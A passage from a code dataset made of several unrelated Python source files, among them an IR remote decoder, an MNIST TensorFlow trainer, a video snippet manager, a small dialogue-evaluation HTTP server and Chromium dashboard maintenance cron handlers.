resolve issue with index {}\".format(uuid, i))\n\n def extract_mentions(self, mentioned):\n \"\"\"Enrich users mentioned in the message\"\"\"\n\n rich_mentions = []\n\n for usr in mentioned:\n if 'userId' in usr.keys():\n rich_mentions.append({'mentioned_username': usr['screenName'], 'mentioned_userId': usr['userId']})\n\n return rich_mentions\n\n","repo_name":"k----n/GrimoireGitter","sub_path":"grimoirelab_elk/enriched/gitter.py","file_name":"gitter.py","file_ext":"py","file_size_in_byte":7086,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"25907669265","text":"from datetime import datetime, time\nfrom calendar import isleap\n\n\ndays = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n\ndef year(start: datetime, end: datetime, days):\n for i in range(start.year, end.year):\n if isleap(i):\n days -= 1\n return days\n\n\ndef count_days(year, month, day):\n count = (year - 1) * 365 + day\n for m in range(1, month):\n count += days[m]\n return count\n\n\nstart = datetime(*map(int, input().split(' ')))\nend = datetime(*map(int, input().split(' ')))\n\nd1 = count_days(start.year, start.month, start.day)\nd2 = count_days(end.year, end.month, end.day)\n\nt1 = time(start.hour, start.minute, start.second)\nt2 = time(end.hour, end.minute, end.second)\n\nif t2 < t1:\n print(d2 - d1 - 1, (end - start).seconds)\nelse:\n print(d2 - d1, (end - start).seconds)\n","repo_name":"Gipnotyin/Yandex_contest_spring_2023","sub_path":"1 задача/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17727720986","text":"import pigpio\r\nimport time\r\nimport traceback\r\n \r\nPinIn = 17\r\nbutton_dict = {\r\n 0x357e304fb: \"mute\",\r\n 0x357e308f7: \"volume_down\",\r\n 0x357e310ef: \"vudu\",\r\n 0x357e31ee1: \"arrow\",\r\n 0x357e32cd3: \"rewind\",\r\n 0x357e330cf: \"disney+\",\r\n 0x357e332cd: \"play/pause\",\r\n 0x357e346b9: \"moon\",\r\n 0x357e34ab5: \"netflix\",\r\n 0x357e354ab: \"ok\",\r\n 0x357e36699: \"back\",\r\n 0x357e37887: \"left\",\r\n 0x357e38679: \"star\",\r\n 0x357e39867: \"up\",\r\n 0x357e3aa55: \"fast_forward\",\r\n 0x357e3b24d: \"hulu\",\r\n 0x357e3b44b: \"right\",\r\n 0x357e3c03f: \"home\",\r\n 0x357e3cc33: \"down\",\r\n 0x357e3e817: \"power\",\r\n 0x357e3f00f: \"volume_up\",\r\n}\r\n\r\n#Sets up GPIO\r\npi = pigpio.pi()\r\npi.set_mode(PinIn, pigpio.INPUT)\r\n\r\n\r\n\r\n \r\n# def poll_sensor(): #Pulls data from sensor\r\n # num1s = 0 #Number of consecutive 1s\r\n # command = [] #Pulses and their timings\r\n # binary = 0b1 #Decoded binary command\r\n # previousValue = 0 #The previous pin state\r\n # value = GPIO.input(PinIn) #Current pin state\r\n \r\n # # Wait until pin is pulled low\r\n # value = 0\r\n # channel = GPIO.wait_for_edge(PinIn, GPIO.FALLING, timeout=100)\r\n \r\n # startTime = time.time() #Sets start time\r\n \r\n # while channel is not None:\r\n # channel = GPIO.wait_for_edge(PinIn, GPIO.BOTH, timeout=100)\r\n \r\n # if value != previousValue: #Waits until change in state occurs\r\n # now = time.time() #Records the current time\r\n # pulseLength = (now - startTime) * 1000000 #Calculate time in between pulses in microseconds\r\n # startTime = now #Resets the start time\r\n # command.append((previousValue, pulseLength)) #Adds pulse time to array (previous val acts as an alternating 1 / 0 to show whether time is the on time or off time)\r\n \r\n # #Reads values again\r\n # previousValue = value\r\n # value = GPIO.input(PinIn)\r\n \r\n # #Covers data to binary\r\n # print(len(command))\r\n # for (typ, tme) in command:\r\n # if typ == 1:\r\n # binary = binary << 1\r\n # # print(round(tme, 1))\r\n # if tme > 1000: #According to NEC protocol a gap of 1687.5 microseconds repesents a logical 1 so over 1000 should make a big enough distinction\r\n # binary += 1\r\n \r\n # if binary.bit_length() > 34: #Sometimes the binary has two rouge charactes on the end\r\n # binary = binary >> (binary.bit_length() - 34)\r\n \r\n # return binary\r\n \r\n \r\n # # Helper function to poll the IR receiver pin and return the code received as an int\r\n # def get_remote_code(self):\r\n # # Record pulses until the wait time elapses\r\n # code = 0\r\n # pulses = []\r\n # try:\r\n # while True:\r\n # pulses.append(self.gpio_events.get(True, self.wait_time))\r\n # # print(pulses)\r\n \r\n # except queue.Empty:\r\n # # If there were no pulses, just return and don't try and convert anything\r\n # if len(pulses) == 0:\r\n # return 0\r\n \r\n # print(len(pulses)) \r\n # # Convert the pulses to binary\r\n # for i in range(len(pulses) - 1):\r\n # # The low pulses are the only ones that matter in terms of decoding\r\n # if pulses[i][0] == 0:\r\n # code = code << 1\r\n # # Logical 1 -> 1687.5us, logical 0 -> 562.5us. So split the difference\r\n # if pulses[i][1] > 1125:\r\n # code += 1\r\n \r\n # if code.bit_length() > 34: # Sometimes the binary has two rouge charactes on the end\r\n # code = code >> (code.bit_length() - 34)\r\n # return code\r\n \r\n \r\nlast_tick = 0\r\n \r\ndef cbf(gpio, level, tick):\r\n global last_tick\r\n print(gpio, level, tick - last_tick)\r\n last_tick = tick\r\n \r\n#Main program loop\r\ntry:\r\n cb1 = pi.callback(17, pigpio.EITHER_EDGE, cbf)\r\n while True:\r\n # command = poll_sensor()\r\n # if command in button_dict:\r\n # print(button_dict[command])\r\n # elif command > 100:\r\n # print(\"Unknown:\", hex(command))\r\n \r\n # channel = pi.wait_for_edge(PinIn, pigpio.EITHER_EDGE, wait_timeout=1)\r\n # after = time.time()\r\n # print((after - before) * 1000000)\r\n # before = after\r\n pass\r\nexcept:\r\n print(traceback.format_exc())\r\nfinally:\r\n pi.stop()\r\n \r\n","repo_name":"jtoby9/window_simulator","sub_path":"remote/remote_test_5.py","file_name":"remote_test_5.py","file_ext":"py","file_size_in_byte":4527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"19074649624","text":"from .configuration import *\nfrom .statistics import *\nfrom .data_helpers import *\n\ndef dataframes_from_config(config, histogram_or_empty='', histogram_index_or_none=None):\n\n default_normalizing_dataframes = [None, None]\n main_and_diff_distributions = [[], []]\n already_normalized = [[], []]\n settings = []\n has_bands = False\n\n # use axis labels as data column headers\n x_title = read_configuration_value(config, key='x_title', index=histogram_index_or_none)\n y_titles = read_configuration_subplot_values(config, key='y_title', defaults=['__no_default__', '__use_main__'], index=histogram_index_or_none)\n\n # condition will be used as legend title by tsplot\n condition = read_configuration_value(config, key='legend_title', default='')\n\n bin_style = read_configuration_value(config, key='bin_style', default='step')\n centered = bin_style == 'center'\n\n x_lim = read_configuration_value(config, key='x_lim', default=None, index=histogram_index_or_none)\n\n if read_configuration_value(config, key='err_estimator', default='asymmetric_hessian_error') == 'asymmetric_hessian_error':\n err_estimator = asymmetric_hessian_error\n else:\n err_estimator = standard_error\n\n data_path = read_configuration_value(config, key='data_path', default=\".\")\n\n config_distributions = read_configuration_value(config, key='distributions')\n\n for distribution in config_distributions:\n\n main_and_diff_normalized_dataframe_or_none, distribution_has_bands, \\\n main_and_diff_distributions_are_normalized = read_distribution(data_path,\n distribution,\n centered,\n condition,\n x_title,\n y_titles,\n x_lim,\n histogram_or_empty=histogram_or_empty,\n err_estimator=err_estimator,\n settings=settings,\n main_and_diff_distributions=main_and_diff_distributions,\n config_distributions=config_distributions)[1:]\n\n for i in range(2):\n if main_and_diff_normalized_dataframe_or_none[i] is not None:\n default_normalizing_dataframes[i] = main_and_diff_normalized_dataframe_or_none[i]\n already_normalized[i].append(main_and_diff_distributions_are_normalized[i])\n\n if distribution_has_bands:\n has_bands = distribution_has_bands\n\n for i, default_normalizing_dataframe in enumerate(default_normalizing_dataframes):\n if default_normalizing_dataframe is not None:\n for distribution, is_already_normalized in zip(main_and_diff_distributions[i], already_normalized[i]):\n if not is_already_normalized:\n for df in distribution:\n df[y_titles[i]] /= default_normalizing_dataframe[y_titles[i]]\n\n for i in range(2):\n main_and_diff_distributions[i] = [pd.concat(dataframes) if len(dataframes) else None for dataframes in main_and_diff_distributions[i]]\n\n return main_and_diff_distributions[0], main_and_diff_distributions[1], settings, has_bands\n","repo_name":"ebothmann/heppyplot","sub_path":"heppyplot/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"73909491150","text":"import tensorflow as tf\nimport mnist\nimport numpy as np\nimport os\nimport math\n\nFLAGS = tf.app.flags.FLAGS\ntf.app.flags.DEFINE_integer('max_step', 10000, 'Number of steps to run trainer')\ntf.app.flags.DEFINE_string('train_dir', './train', 'Directory where to write event logs and checkpoint')\n\n\ndef evaluate(sess, top_k_op, training, examples):\n iter_per_epoch = int(math.ceil(examples / FLAGS.batch_size))\n # total_sample = iter_per_epoch * FLAGS.batch_size\n correct_predict = 0\n step = 0\n\n while step < iter_per_epoch:\n predict = sess.run(top_k_op, feed_dict={training: False})\n correct_predict += np.sum(predict)\n step += 1\n\n precision = correct_predict / examples\n return precision\n\n\ndef train():\n filenames = tf.placeholder(tf.string, [None])\n dataset = tf.data.TFRecordDataset(filenames)\n dataset = dataset.map(mnist.parse_data)\n dataset = dataset.shuffle(buffer_size=50000)\n dataset = dataset.batch(FLAGS.batch_size)\n dataset = dataset.repeat()\n\n iterator = dataset.make_initializable_iterator()\n\n global_step = tf.train.get_or_create_global_step()\n images, labels = iterator.get_next()\n logits, pred = mnist.inference(images, training=True)\n loss = mnist.loss(logits, labels)\n train_op = mnist.train(loss, global_step)\n\n with tf.train.MonitoredTrainingSession(\n checkpoint_dir=FLAGS.train_dir,\n hooks=[tf.train.StopAtStepHook(last_step=FLAGS.max_step), tf.train.NanTensorHook(loss)],\n save_checkpoint_steps=100\n ) as mon_sess:\n mon_sess.run(iterator.initializer, feed_dict={filenames: ['train_img.tfrecords']})\n while not mon_sess.should_stop():\n _, train_loss, train_step, label = mon_sess.run([train_op, loss, global_step, labels])\n if train_step % 100 == 0:\n print('step: {}, loss: {}'.format(train_step, train_loss))\n\n\ndef train_and_validation():\n training_dataset = tf.data.TFRecordDataset(['./train_img.tfrecords'])\n validation_dataset = tf.data.TFRecordDataset(['./validation_img.tfrecords'])\n test_dataset = tf.data.TFRecordDataset(['./test_img.tfrecords'])\n\n training_dataset = training_dataset.map(mnist.parse_data)\n training_dataset = training_dataset.shuffle(50000).batch(FLAGS.batch_size).repeat()\n validation_dataset = validation_dataset.map(mnist.parse_data).batch(FLAGS.batch_size)\n test_dataset = test_dataset.map(mnist.parse_data).batch(FLAGS.batch_size)\n\n iterator = tf.data.Iterator.from_structure(output_types=training_dataset.output_types,\n output_shapes=training_dataset.output_shapes)\n\n training_init_op = iterator.make_initializer(training_dataset)\n validation_init_op = iterator.make_initializer(validation_dataset)\n test_init_op = iterator.make_initializer(test_dataset)\n images, labels = iterator.get_next()\n\n training = tf.placeholder(dtype=tf.bool)\n logits, pred = mnist.inference(images, training=training)\n loss = mnist.loss(logits, labels)\n top_k_op = tf.nn.in_top_k(logits, labels, 1)\n global_step = tf.train.get_or_create_global_step()\n train_op = mnist.train(loss, global_step)\n saver = tf.train.Saver()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(training_init_op)\n print('begin to train!')\n ckpt = os.path.join(FLAGS.train_dir, 'model.ckpt')\n train_step = 0\n while train_step < FLAGS.max_step:\n _, train_loss, step, label = sess.run([train_op, loss, global_step, labels], feed_dict={training: True})\n train_step += 1\n if train_step % 100 == 0:\n saver.save(sess, ckpt, train_step)\n if train_step % 1000 == 0:\n precision = evaluate(sess, top_k_op, training, mnist.TRAIN_EXAMPLES_NUM)\n print('step: {}, loss: {}, training precision: {}'.format(train_step, train_loss, precision))\n sess.run(validation_init_op)\n precision = evaluate(sess, top_k_op, training, mnist.VALIDATION_EXAMPLES_NUM)\n print('step: {}, loss: {}, validation precision: {}'.format(train_step, train_loss, precision))\n sess.run(training_init_op)\n sess.run(test_init_op)\n precision = evaluate(sess, top_k_op, training, mnist.TEST_EXAMPLES_NUM)\n print('finally test precision: {}'.format(precision))\n\n\nif __name__ == '__main__':\n if tf.gfile.Exists(FLAGS.train_dir):\n tf.gfile.DeleteRecursively(FLAGS.train_dir)\n tf.gfile.MakeDirs(FLAGS.train_dir)\n # train()\n train_and_validation()\n\n","repo_name":"buptlj/learn_tf","sub_path":"mnist_train_tfdata.py","file_name":"mnist_train_tfdata.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"83"} +{"seq_id":"74958894672","text":"#!/usr/bin/env python3\nfrom SnippetGenerator import SnippetGenerator as snpg\nimport SnippetGenerator\n# import datetime\nfrom datetime import timedelta, datetime\nimport logging\nimport argparse\nimport multiprocessing as mp\nfrom skaimsginterface.skaimessages import *\nfrom skaimsginterface.tcp import MultiportTcpListenerMP, TcpSenderMP\nfrom pathlib import Path\n\n\nclass SnippetManager:\n logger = logging.getLogger(__name__)\n error_logger = logging.getLogger(f'{__name__}_errors')\n camfolder_day_format = '%Y-%m-%d'\n\n def __init__(self, print_q) -> None:\n self.stop_event = mp.Event()\n self.print_q = print_q\n self.msg_q = mp.Queue()\n\n # start handler process\n self.start_handler()\n\n # start listener process\n self.ports = [7201]\n self.listener = MultiportTcpListenerMP(portlist=self.ports,\n multiport_callback_func=self.multiport_callback,\n print_q=self.print_q,\n recordfile=None,\n verbose=True)\n\n def start_handler(self):\n self.handle_proc = mp.Process(name=f'snip_mgr_em_msg_handler',\n target=self.handle_em_msgs,\n args=(\n self.stop_event,\n self.print_q,\n self.msg_q,\n ))\n self.handle_proc.daemon = True\n self.handle_proc.start()\n\n def stop(self):\n self.stop_event.set()\n self.listener.stop()\n\n @staticmethod\n def handle_em_msgs(stop_event, print_q, msg_q):\n ten_sec = timedelta(seconds=10)\n five_sec = timedelta(seconds=10)\n logger = SnippetManager.logger\n error_logger = SnippetManager.error_logger\n while not stop_event.is_set():\n try:\n if not msg_q.empty():\n msg = msg_q.get_nowait()\n\n # continue if no camera time ranges in msg\n if len(msg.camera_time_ranges) == 0:\n printmsg = f'got msg type {msg.event} with cam time ranges list empty! not processing...'\n logger.debug(printmsg)\n error_logger.debug(printmsg)\n continue\n\n # output folder naming (event primary_obj.global_id event_starttime event_endtime)\n event_start_time_dt = snpg.convert_protobuf_ts_to_utc_datetime(msg.event_starttime)\n event_end_time_dt = snpg.convert_protobuf_ts_to_utc_datetime(msg.event_starttime)\n date_str = event_start_time_dt.strftime('%Y-%m-%d')\n event_start_time_str = event_start_time_dt.strftime('%H-%M-%S')\n event_end_time_str = event_end_time_dt.strftime('%H-%M-%S')\n output_folder = f\"/snippets/{date_str}/E{msg.event}/ID{msg.primary_obj.global_id}/T{event_start_time_str}_T{event_end_time_str}_UTC\"\n\n # create output folder exist ok\n Path(output_folder).mkdir(parents=True, exist_ok=True)\n\n # input folder path based on day from event_start_time_dt (UTC time)\n day_folder = event_start_time_dt.strftime(SnippetManager.camfolder_day_format)\n cam_folder_path = f'/skaivideos/{day_folder}'\n\n # each task is SnippetGenerator.Task(cam_folder, start_time, end_time, output_file, TimeRangeBBoxes)\n tasks = []\n camera_mac_strings = []\n for ctr in msg.camera_time_ranges:\n if ctr.camera_id is None:\n printmsg = f'got missing camera id!'\n logger.exception(printmsg)\n error_logger.exception(printmsg)\n continue\n mac_hex_str = SkaiMsg.convert_camera_id_to_mac_addr_string(ctr.camera_id).upper()\n mac_hex_str_no_colon = mac_hex_str.replace(':', '')\n camera_mac_strings.append(mac_hex_str)\n\n # convert ctr times to utc datetime objects\n start_time_dt = snpg.convert_protobuf_ts_to_utc_datetime(ctr.start_timestamp)\n end_time_dt = snpg.convert_protobuf_ts_to_utc_datetime(ctr.end_timestamp)\n \n # TODO: compare bbox timestamps to see if they're in range?\n\n # check if duration is < 10 sec. if so move the start time back 5 sec\n duration = (end_time_dt - start_time_dt)\n if duration < ten_sec:\n start_time_dt = start_time_dt - five_sec\n\n # check if end time N sec of current time. if so delay N sec\n N = 15\n X = 10\n current_dt_utc = snpg.get_current_utc_datetime()\n cur_minus_X = current_dt_utc - timedelta(seconds=X)\n if end_time_dt > cur_minus_X:\n logger.info(f'got msg with end time {end_time_dt} > cur_t - 3 ({cur_minus_X}). delaying {N} seconds')\n time.sleep(N)\n\n # form strings for output file\n date_str = start_time_dt.strftime('%Y-%m-%d')\n start_time_str = start_time_dt.strftime('%H-%M-%S')\n end_time_str = end_time_dt.strftime('%H-%M-%S')\n\n cam_folder = f\"{cam_folder_path}/{mac_hex_str_no_colon}\"\n if Path(cam_folder).is_dir():\n output_file = f\"{output_folder}/{mac_hex_str_no_colon}_{date_str}_T{start_time_str}_T{end_time_str}_UTC.mp4\"\n # tasks.append([cam_folder, start_time_dt, end_time_dt, output_file])\n tasks.append(\n snpg.Task(cam_folder, start_time_dt, end_time_dt, output_file, ctr.tr_boxes))\n else:\n error_logger.exception(\n f'Not able to find folder {cam_folder}!!! not generating snippet for that cam')\n\n logger.info(\n f'got msg event: {msg.event} for cameras {camera_mac_strings} from {event_start_time_dt} to {event_end_time_dt}'\n )\n logger.info(f'tasks: {len(tasks)}')\n\n # for cam_folder, start_time, end_time, output_file in tasks:\n # logger.info(f'generating snippet for {cam_folder} {start_time} {end_time} {output_file}')\n # snpg.generate_snippet_for_cam(cam_folder, start_time, end_time, output_file)\n # logger.info('done')\n for t in tasks:\n logger.info(f'generating snippet for {t}')\n snpg.process_task(t)\n logger.info('done')\n except Exception as e:\n logger.exception(e)\n error_logger.exception(e)\n\n def multiport_callback(self, data, server_address):\n try:\n msg_type, msg = SkaiMsg.unpack(data)\n if msg_type == SkaiMsg.MsgType.SKAI_EVENT:\n self.msg_q.put_nowait(msg)\n except Exception as e:\n logger.exception(e)\n\n\nif __name__ == '__main__':\n #### argparse config ####\n parser = argparse.ArgumentParser()\n # parser.add_argument()\n args = parser.parse_args()\n\n #### logger config ####\n # lowest_log_level = logging.INFO\n lowest_log_level = logging.DEBUG\n\n # setup loggers for command line output and file output\n logger = logging.getLogger(__name__)\n logger.setLevel(lowest_log_level)\n\n error_logger = logging.getLogger(f'{__name__}_errors')\n error_logger.setLevel(logging.DEBUG)\n\n sg_logger = logging.getLogger(SnippetGenerator.__name__)\n sg_logger.setLevel(lowest_log_level)\n\n sg_error_logger = logging.getLogger(f'{SnippetGenerator.__name__}_errors')\n sg_error_logger.setLevel(lowest_log_level)\n\n # setup same format and file handler for both main and SnippetManager loggers\n log_format = logging.Formatter('%(asctime)s [%(levelname)8s] %(message)s')\n\n # file logging config\n fh = logging.FileHandler('/skailogs/snpm.log', mode='w')\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(log_format)\n\n error_fh = logging.FileHandler('/skailogs/snpm_errors.log', mode='w')\n error_fh.setLevel(logging.DEBUG)\n error_fh.setFormatter(log_format)\n\n # stdout logging config\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(log_format)\n\n # attach handlers\n logger.addHandler(fh)\n logger.addHandler(ch)\n error_logger.addHandler(error_fh)\n error_logger.addHandler(ch)\n sg_logger.addHandler(fh)\n sg_logger.addHandler(ch)\n sg_error_logger.addHandler(error_fh)\n sg_error_logger.addHandler(ch)\n\n # init messages\n logger.info('==== Snippet Manager Logger Started ====')\n error_logger.info('==== Snippet Manager Error Logger Started ====')\n sg_logger.info('==== Snippet Generator Logger Started ====')\n\n #### Snippet Manager setup ####\n print_q = mp.Queue()\n snp_mgr = SnippetManager(print_q)\n logger.info('Snippet Manager started!')\n\n #### stay active until ctrl+c input ####\n try:\n while True:\n if not print_q.empty():\n logger.info(print_q.get_nowait())\n time.sleep(0.0000001)\n except KeyboardInterrupt:\n logger.info('snippet manager got keyboard interrupt!')\n finally:\n logger.info('stopping snippet manager...')\n snp_mgr.stop()","repo_name":"pwolfeGTRI/snippet_manager","sub_path":"ContainerCode/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"45136598884","text":"import sys\nimport time\nimport math\nimport re\nimport difflib\nimport collections\nimport json\nimport random\n\nfrom datetime import datetime\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom urllib.parse import parse_qs, urlparse\nfrom page import *\n\nfrom pathlib import Path\n\n\ndef start():\n\n class MyHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_GET(self):\n normal_paths = {\n '/': {'status': 200},\n '/favicon.ico': {'status': 202}, # Need for chrome\n }\n que_path = '/?page='\n if not self.path.startswith(que_path) and not self.path in normal_paths:\n response = 500\n self.send_response(response)\n self.send_header('Content-Type', 'text/html; charset=utf-8')\n self.end_headers()\n content = WEB_HTML.format(STYLE_SHEET, CSS, FONT_AWESOME, JS)\n self.wfile.write(bytes(content, 'UTF-8'))\n\n elif self.path in normal_paths:\n response = normal_paths[self.path]['status']\n print('path = {}'.format(self.path))\n\n parsed_path = urlparse(self.path)\n print('parsed: path = {}, query = {}'.format(parsed_path.path, parse_qs(parsed_path.query)))\n\n print('headers\\r\\n-----\\r\\n{}-----'.format(self.headers))\n\n self.send_response(response)\n self.send_header('Content-Type', 'text/html; charset=utf-8')\n self.end_headers()\n content = WEB_HTML.format(STYLE_SHEET, CSS, FONT_AWESOME, JS)\n self.wfile.write(bytes(content, 'UTF-8'))\n\n else:\n response = 200\n print('path = {}'.format(self.path))\n\n parsed_path = urlparse(self.path)\n print('parsed: path = {}, query = {}'.format(parsed_path.path, parse_qs(parsed_path.query)))\n\n print('headers\\r\\n-----\\r\\n{}-----'.format(self.headers))\n\n self.send_response(response)\n self.send_header('Content-Type', 'text/html; charset=utf-8')\n self.end_headers()\n content = WEB_HTML.format(STYLE_SHEET, CSS, FONT_AWESOME, JS)\n self.wfile.write(bytes(content, 'UTF-8'))\n\n def do_POST(self):\n \"\"\"\n Handle POST request, especially replying to a chat message.\n \"\"\"\n print('path = {}'.format(self.path))\n parsed_path = urlparse(self.path)\n print('parsed: path = {}, query = {}'.format(parsed_path.path, parse_qs(parsed_path.query)))\n\n print('headers\\r\\n-----\\r\\n{}-----'.format(self.headers))\n\n if self.path == '/start':\n content_length = int(self.headers['content-length'])\n try:\n content = self.rfile.read(content_length).decode('utf-8')\n print('body = {}'.format(content))\n\n body = json.loads(content)\n\n did = body[\"id\"]\n with open(f\"../data/{did}.json\", \"r\") as t:\n dialogues = json.loads(t.read())\n\n response = dialogues\n except Exception as e:\n print(\"error\", e, flush=True)\n response = {\"text\": f\"server error!!! 入力形式に誤りがあります。error Message: {e}\"}\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n json_str = json.dumps(response)\n self.wfile.write(bytes(json_str, 'utf-8'))\n \n elif self.path == '/end':\n content_length = int(self.headers['content-length'])\n try:\n content = self.rfile.read(content_length).decode('utf-8')\n print('body = {}'.format(content))\n\n body = json.loads(content)\n\n uname = body[\"name\"]\n did = body[\"id\"]\n Path(f\"../log/{did}\").mkdir(parents=True, exist_ok=True)\n with open(f\"../log/{did}/{uname}.json\", \"w\") as t:\n print(body, file=t)\n\n model_response = {\"text\": \"ok\"}\n except Exception as e:\n print(\"error\", e, flush=True)\n model_response = {\"text\": f\"server error!!! 入力形式に誤りがあります。error Message: {e}\"}\n self.send_response(200)\n self.send_header('Content-type', 'application/json')\n self.end_headers()\n json_str = json.dumps(model_response)\n self.wfile.write(bytes(json_str, 'utf-8'))\n\n \n print(\"Start\", flush=True)\n address = ('localhost', 8080)\n\n MyHTTPRequestHandler.protocol_version = 'HTTP/1.0'\n with HTTPServer(address, MyHTTPRequestHandler) as server:\n server.serve_forever()\n\n\ndef main():\n start()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"horiso0921/vsEvalPlatform","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35242114613","text":"#!/usr/bin/env python3\n\nimport os\nimport logging\nimport time\nfrom defs import run_with_locker, get_logger, load_data, ssh_run\n\nbasepath = os.path.realpath(__file__)[:-3]\nlogfile = basepath + '.log'\nlockfile = basepath + '.lock'\n\n@run_with_locker(lockfile)\ndef run():\n logger = get_logger(logfile, 'sanscript.fc')\n\n connections = []\n dirpath = os.path.dirname(os.path.realpath(__file__))\n for filename in ['FabricConnection.json', 'SwitchConnection.json']:\n filepath = os.path.join(dirpath, filename)\n connections += load_data(filepath, [])\n\n for connection in connections:\n args = [connection[key] for key in ['name', 'address', 'username', 'password']]\n args.append([])\n system, outs, errs, exception = ssh_run(args)\n if exception:\n logger.warning('%s test failed - %s' %(system, exception))\n else:\n logger.info('%s test success' %system)\n\n \nif __name__ == '__main__':\n run()\n","repo_name":"tulsluper/sanscript","sub_path":"apps/fc/scripts/test_connections.py","file_name":"test_connections.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8101063547","text":"import logging\nfrom google.cloud import ndb # type: ignore\n\nfrom framework.basehandlers import FlaskHandler\nfrom internals import approval_defs\nfrom internals.core_models import FeatureEntry, Stage\nfrom internals.review_models import Gate\nfrom internals.core_enums import *\n\n\nclass EvaluateGateStatus(FlaskHandler):\n\n def get_template_data(self, **kwargs):\n \"\"\"Evaluate all existing Gate entities and set correct state.\"\"\"\n self.require_cron_header()\n\n gates: ndb.Query = Gate.query()\n count = 0\n batch = []\n BATCH_SIZE = 100\n for gate in gates:\n if approval_defs.update_gate_approval_state(gate):\n batch.append(gate)\n count += 1\n if len(batch) > BATCH_SIZE:\n ndb.put_multi(batch)\n batch = []\n\n ndb.put_multi(batch)\n return f'{count} Gate entities updated.'\n\n\nclass WriteMissingGates(FlaskHandler):\n\n GATES_TO_CREATE_PER_RUN = 5000\n\n GATE_RULES: dict[int, dict[int, list[int]]] = {\n fe_type: dict(stages_and_gates)\n for fe_type, stages_and_gates in STAGES_AND_GATES_BY_FEATURE_TYPE.items()\n }\n\n def make_needed_gates(self, fe, stage, existing_gates):\n \"\"\"Instantiate and return any needed gates for the given stage.\"\"\"\n if not fe:\n logging.info(f'Stage {stage.key.integer_id()} has no feature entry')\n return []\n if fe.feature_type not in self.GATE_RULES:\n logging.info(f'Skipping stage of bad feature {fe.key.integer_id()}')\n return []\n if stage.stage_type not in self.GATE_RULES[fe.feature_type]:\n logging.info(f'Skipping bad stage {stage.key.integer_id()} ')\n return []\n\n\n new_gates: list[Gate] = []\n needed_gates = self.GATE_RULES[fe.feature_type][stage.stage_type]\n for needed_gate_type in needed_gates:\n if not any(eg for eg in existing_gates\n if eg.gate_type == needed_gate_type):\n gate = Gate(\n feature_id=stage.feature_id,\n stage_id=stage.key.integer_id(),\n gate_type=needed_gate_type,\n state=Gate.PREPARING)\n new_gates.append(gate)\n return new_gates\n\n def get_template_data(self, **kwargs):\n \"\"\"Create a chunk of needed gates for all features.\"\"\"\n self.require_cron_header()\n\n all_feature_entries = FeatureEntry.query().fetch()\n fe_by_id = {fe.key.integer_id(): fe\n for fe in all_feature_entries}\n existing_gates_by_stage_id = collections.defaultdict(list)\n for gate in Gate.query():\n existing_gates_by_stage_id[gate.stage_id].append(gate)\n\n gates_to_write: list(Gate) = []\n for stage in Stage.query():\n new_gates = self.make_needed_gates(\n fe_by_id.get(stage.feature_id), stage,\n existing_gates_by_stage_id[stage.key.integer_id()])\n gates_to_write.extend(new_gates)\n if len(gates_to_write) > self.GATES_TO_CREATE_PER_RUN:\n break # Stop early if we risk exceeding GAE timeout.\n\n ndb.put_multi(gates_to_write)\n\n return f'{len(gates_to_write)} missing gates created for stages.'\n\n\nclass MigrateGeckoViews(FlaskHandler):\n\n MAPPING = {\n GECKO_IMPORTANT: PUBLIC_SUPPORT,\n GECKO_WORTH_PROTOTYPING: PUBLIC_SUPPORT,\n GECKO_NONHARMFUL: NEUTRAL,\n GECKO_HARMFUL: OPPOSED,\n }\n\n def update_ff_views(self, fe):\n \"\"\"Update ff_views and return True if update was needed.\"\"\"\n if fe.ff_views in self.MAPPING:\n fe.ff_views = self.MAPPING[fe.ff_views]\n return True\n\n return False\n\n def get_template_data(self, **kwargs):\n \"\"\"Change gecko views from old options to a more common list.\"\"\"\n self.require_cron_header()\n\n features: ndb.Query = FeatureEntry.query(\n FeatureEntry.ff_views != NO_PUBLIC_SIGNALS)\n count = 0\n batch = []\n BATCH_SIZE = 100\n for fe in features:\n if self.update_ff_views(fe):\n batch.append(fe)\n count += 1\n if len(batch) > BATCH_SIZE:\n ndb.put_multi(batch)\n batch = []\n\n ndb.put_multi(batch)\n return f'{count} FeatureEntry entities updated.'\n","repo_name":"DreamHigh0820/chromium-dashboard","sub_path":"internals/maintenance_scripts.py","file_name":"maintenance_scripts.py","file_ext":"py","file_size_in_byte":3989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72225343631","text":"from notifications.signals import notify\n\nfrom django.utils import timezone\nfrom django.db import models\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\n\n\nINTERN_TYPES = (\n ('Paid', 'Paid'),\n ('Unpaid', 'Unpaid')\n)\n\nINTERN_WHERE = (\n ('Virtual', 'Virtual'),\n ('In-Person', 'In-Person')\n)\n\n\nclass Listing(models.Model):\n company = models.ForeignKey(\n 'accounts.User', on_delete=models.CASCADE, related_name='listing')\n title = models.CharField(max_length=50)\n type = models.CharField(choices=INTERN_TYPES, max_length=20)\n where = 